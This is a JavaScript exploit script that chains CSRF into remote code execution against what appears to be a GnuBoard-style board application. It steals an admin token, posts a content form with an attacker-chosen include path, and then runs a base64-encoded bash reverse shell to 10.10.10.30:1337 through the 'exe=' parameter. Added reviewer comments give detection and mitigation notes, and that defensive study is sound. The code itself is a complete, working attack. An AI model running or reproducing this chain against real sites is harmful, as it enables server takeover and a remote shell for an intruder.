/* CSRF -> RCE Script */
// Linux Server reverse shell -- Change it to your preferred option
// base64 encoded of command ( /bin/bash -c 'bash -i >& /dev/tcp/10.10.10.30/1337 0>&1' )
//
// Reviewer summary (defensive reading of the three stages below):
//   stage1 -> GET  ../ajax.token.php           : reads a token out of the response text
//   stage2 -> POST ../contentformupdate.php    : submits a content-settings form using that token
//   stage3 -> GET  ../../bbs/content.php?...   : passes `cmd` in the `exe=` query parameter
// All three requests use relative URLs, so the script presumably runs from a document on the
// same origin as the targeted application and relies on the browser attaching the victim's
// existing session cookies (same-origin XMLHttpRequest) — confirm against the delivery context.
// Detection: look for GET requests to bbs/content.php whose `exe=` parameter carries
// "base64 -d|bash", and for POSTs to contentformupdate.php whose `co_include_head` points at
// a path outside the expected skin/content directories.
// Mitigation: do not expose the anti-CSRF token to a simple same-origin GET that a
// script-bearing page can read; set SameSite on session cookies; restrict `co_include_head`
// to an allow-list instead of an arbitrary path.
var cmd = 'L2Jpbi9iYXNoIC1jICdiYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjEwLjMwLzEzMzcgMD4mMSc=';
// Filled in by stage1 from the ajax.token.php response; empty until then.
var ajax_token = '';
// Content identifier used by both the form POST (stage2) and the final GET (stage3).
var co_id = 'community';

function stage3(){
  // Stage3 : Execute command
  // `cmd` (the base64 blob above) is URL-encoded and placed in the `exe=` parameter; the
  // trailing `%23` is a '#' that the server-side handler presumably treats as a comment
  // terminator — TODO confirm against the target's content.php.
  cmd = encodeURIComponent(cmd);
  var xhr = new XMLHttpRequest();
  xhr.open('GET', '../../bbs/content.php?co_id=' + co_id + '&exe=echo ' + cmd + '|base64 -d|bash;%23', true);
  xhr.send(null);
}

function stage2(){
  // Stage2 : upload vulnerable script
  // Builds a form-encoded body carrying the token from stage1; `co_include_head` is set to a
  // relative path under plugin/okname/, which is the value a defender would flag (see header).
  // NOTE(review): post_data is assigned without var/let and so becomes an implicit global.
  post_data = 'w=&co_html=1&token=' + ajax_token + '&co_id=' + co_id + '&co_subject=커뮤니티&co_content=community&co_mobile_content=&co_skin=basic&co_mobile_skin=basic&co_tag_filter_user=0&co_include_head=../plugin/okname/hpcert1.php&co_include_tail=&captcha_key=&co_himg=&co_timg=';
  var xhr = new XMLHttpRequest();
  xhr.onreadystatechange = function() {
    // Chains to stage3 once the POST completes; the response status is never checked, so
    // stage3 runs even if the update was rejected.
    if (xhr.readyState == XMLHttpRequest.DONE) {
      stage3();
    }
  }
  xhr.open('POST', '../contentformupdate.php', true);
  xhr.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
  xhr.send(post_data);
}

function stage1(){
  // Stage1 : Get admin token
  // Extracts the value following `"token":"` from the raw response text by string splitting;
  // if the marker is absent, split(...)[1] is undefined and the next .split throws.
  var xhr = new XMLHttpRequest();
  xhr.onreadystatechange = function() {
    if (xhr.readyState == XMLHttpRequest.DONE) {
      ajax_token = xhr.responseText.split('"token":"')[1].split('"')[0];
      stage2();
    }
  }
  xhr.open('GET', '../ajax.token.php', true);
  xhr.send(null);
}

// Start from stage1
stage1();